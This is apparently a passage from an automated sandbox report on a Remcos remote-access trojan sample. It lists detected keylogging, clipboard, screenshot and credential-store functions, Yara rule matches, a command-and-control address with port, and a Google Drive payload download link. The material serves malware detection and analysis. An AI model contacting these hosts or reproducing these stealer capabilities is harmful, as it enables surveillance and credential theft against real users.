Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 15_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,15_2_00407898
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 16_2_0040702D FindFirstFileA,FindNextFileA,strlen,strlen,16_2_0040702D
Contains functionality to query local drivesShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_00403B9A ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ,?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,GetLogicalDriveStringsA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z,?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$ch12_2_00403B9A

Networking:

barindex
Detected TCP or UDP traffic on non-standard portsShow sources
Source: global trafficTCP traffic: 192.168.2.6:49938 -> 185.140.53.21:2404
IP address seen in connection with other malwareShow sources
Source: Joe Sandbox ViewIP Address: 172.217.168.33 172.217.168.33
Internet Provider seen in connection with other malwareShow sources
Source: Joe Sandbox ViewASN Name: unknown unknown
JA3 SSL client fingerprint seen in connection with other malwareShow sources
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Contains functionality to download additional files from the internetShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_00402139 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,malloc,recv,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,free,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,12_2_00402139
Found strings which match to known social media urlsShow sources
Source: ieinstal.exe, 0000000C.00000003.1191402579.0000000005121000.00000004.00000001.sdmpString found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: ieinstal.exe, 0000000C.00000003.1191402579.0000000005121000.00000004.00000001.sdmpString found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: ieinstal.exe, 0000000F.00000002.1168625916.0000000000400000.00000040.00000001.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: ieinstal.exeString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: doc-0k-4k-docs.googleusercontent.com
Urls found in memory or binary dataShow sources
Source: Read Me.exe, 00000000.00000003.1119787693.00000000008C2000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Read Me.exe, 00000000.00000003.1119787693.00000000008C2000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/GTS1O1.crl0
Source: Read Me.exe, 00000000.00000003.1119787693.00000000008C2000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: Read Me.exe, 00000000.00000003.1119787693.00000000008C2000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/gsr202
Source: Read Me.exe, 00000000.00000003.1119787693.00000000008C2000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/gts1o10
Source: Read Me.exe, 00000000.00000003.1119787693.00000000008C2000.00000004.00000001.sdmpString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: ieinstal.exeString found in binary or memory: http://www.ebuddy.com
Source: Read Me.exe, 00000000.00000003.1120249351.0000000000898000.00000004.00000001.sdmpString found in binary or memory: http://www.google.com/support/accounts/answer/151657?hl=en
Source: ieinstal.exeString found in binary or memory: http://www.imvu.com
Source: ieinstal.exe, 0000000F.00000002.1168625916.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: ieinstal.exe, 0000000F.00000002.1168625916.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.imvu.comr
Source: ieinstal.exe, 0000000F.00000002.1173268471.000000000334C000.00000004.00000040.sdmpString found in binary or memory: http://www.imvu.comta
Source: ieinstal.exe, ieinstal.exe, 00000010.00000002.1167594919.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.nirsoft.net/
Source: Read Me.exe, 00000000.00000003.1120249351.0000000000898000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
Source: Read Me.exe, 00000000.00000003.1119787693.00000000008C2000.00000004.00000001.sdmp, Read Me.exe, 00000000.00000002.1124921394.0000000000869000.00000004.00000020.sdmpString found in binary or memory: https://doc-0k-4k-docs.googleusercontent.com/
Source: Read Me.exe, 00000000.00000003.1120249351.0000000000898000.00000004.00000001.sdmpString found in binary or memory: https://doc-0k-4k-docs.googleusercontent.com/docs/securesc/7448b6q78tipvgksrv0g7haa8csaak8p/ce51bu5a
Source: Read Me.exe, 00000000.00000003.1119787693.00000000008C2000.00000004.00000001.sdmpString found in binary or memory: https://docs.google.com/
Source: Read Me.exe, 00000000.00000003.1120249351.0000000000898000.00000004.00000001.sdmpString found in binary or memory: https://docs.google.com/J
Source: Read Me.exe, 00000000.00000003.1119787693.00000000008C2000.00000004.00000001.sdmpString found in binary or memory: https://docs.google.com/nonceSigner?nonce=qugd7d2n5rafm&continue=https://doc-0k-4k-docs.googleuserco
Source: Read Me.exe, 00000000.00000003.1120249351.0000000000898000.00000004.00000001.sdmpString found in binary or memory: https://docs.google.com/t
Source: Read Me.exe, 00000000.00000003.1119787693.00000000008C2000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/
Source: Read Me.exe, 00000000.00000002.1124921394.0000000000869000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/#
Source: Read Me.exe, 00000000.00000002.1124921394.0000000000869000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/3
Source: Read Me.exe, 00000000.00000003.1120249351.0000000000898000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/9
Source: Read Me.exe, 00000000.00000002.1124921394.0000000000869000.00000004.00000020.sdmp, Read Me.exe, 00000000.00000002.1134494025.00000000028EB000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/u/0/uc?id=1pPDL3bVPKcRW5oANFuDWLxxLlrJBV2jZ&export=download
Source: Read Me.exe, 00000000.00000003.1120249351.0000000000898000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com
Source: Read Me.exe, 00000000.00000003.1119787693.00000000008C2000.00000004.00000001.sdmpString found in binary or memory: https://pki.goog/repository/0
Source: ieinstal.exeString found in binary or memory: https://www.google.com
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality to capture and log keystrokesShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [Esc] 12_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [Enter] 12_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [Tab] 12_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [Down] 12_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [Right] 12_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [Up] 12_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [Left] 12_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [End] 12_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [F2] 12_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [F1] 12_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [Del] 12_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [Del] 12_2_00405DA6
Contains functionality for read data from the clipboardShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_0040D1E8 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trai12_2_0040D1E8
Contains functionality to read the clipboard dataShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_0040D1E8 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trai12_2_0040D1E8
Contains functionality to record screenshotsShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_0040F460 Sleep,CreateDCA,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,DeleteDC,DeleteDC,DeleteDC,DeleteObject,SelectObject,DeleteDC,DeleteDC,DeleteDC,DeleteObject,StretchBlt,DeleteDC,DeleteDC,DeleteDC,DeleteObject,DeleteObject,GetCursorInfo,GetIconInfo,DeleteObject,DeleteObject,DrawIcon,GetObjectA,DeleteDC,DeleteDC,DeleteDC,DeleteObject,LocalAlloc,GlobalAlloc,DeleteDC,DeleteDC,DeleteDC,DeleteObject,GetDIBits,DeleteDC,DeleteDC,DeleteDC,DeleteObject,GlobalFree,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,DeleteObject,GlobalFree,DeleteDC,DeleteDC,DeleteDC,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,12_2_0040F460
Creates a DirectInput object (often for capturing keystrokes)Show sources
Source: Read Me.exe, 00000000.00000002.1124688792.0000000000830000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Potential key logger detected (key state polling based)Show sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_00405221 GetKeyState,GetKeyState,GetKeyState,CallNextHookEx,12_2_00405221

E-Banking Fraud:

barindex
Yara detected Remcos RATShow sources
Source: Yara matchFile source: 0000000C.00000002.1501343560.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000B.00000002.1155859382.0000000004488000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000B.00000002.1156091157.00000000044E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.1136853129.00000000047AF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000012.00000002.1187525190.0000000002C20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.1136736873.000000000478F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000012.00000002.1187354967.0000000002BD8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000013.00000002.1180206351.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000B.00000002.1154726016.0000000004250000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000012.00000002.1186754617.00000000029A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: Read Me.exe PID: 3156, type: MEMORY
Source: Yara matchFile source: Process Memory Space: ieinstal.exe PID: 5756, type: MEMORY
Source: Yara matchFile source: Process Memory Space: Dprgees.exe PID: 4032, type: MEMORY
Source: Yara matchFile source: Process Memory Space: Dprgees.exe PID: 5088, type: MEMORY
Source: Yara matchFile source: Process Memory Space: ieinstal.exe PID: 5692, type: MEMORY
Source: Yara matchFile source: 11.2.Dprgees.exe.44e0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 11.2.Dprgees.exe.44e0000.5.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 18.2.Dprgees.exe.2c20000.5.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 18.2.Dprgees.exe.2c20000.5.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 19.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 12.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 19.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 12.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE

Spam, unwanted Advertisements and Ransom Demands:

barindex
Contains functionalty to change the wallpaperShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_00412EE3 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,SystemParametersInfoW,12_2_00412EE3

System Summary:

barindex
Malicious sample detected (through community Yara rule)Show sources
Source: 0000000C.00000002.1501343560.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000C.00000002.1501343560.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos Payload Author: kevoreilly
Source: 0000000B.00000002.1156091157.00000000044E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000B.00000002.1156091157.00000000044E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos Payload Author: kevoreilly
Source: 00000012.00000002.1187525190.0000000002C20000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
Source: 00000012.00000002.1187525190.0000000002C20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos Payload Author: kevoreilly
Source: 00000010.00000002.1167594919.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 00000013.00000002.1180206351.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
Source: 00000013.00000002.1180206351.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos Payload Author: kevoreilly
Source: 16.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 11.2.Dprgees.exe.44e0000.5.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
Source: 11.2.Dprgees.exe.44e0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
Source: 11.2.Dprgees.exe.44e0000.5.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
Source: 11.2.Dprgees.exe.44e0000.5.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
Source: 18.2.Dprgees.exe.2c20000.5.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
Source: 18.2.Dprgees.exe.2c20000.5.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
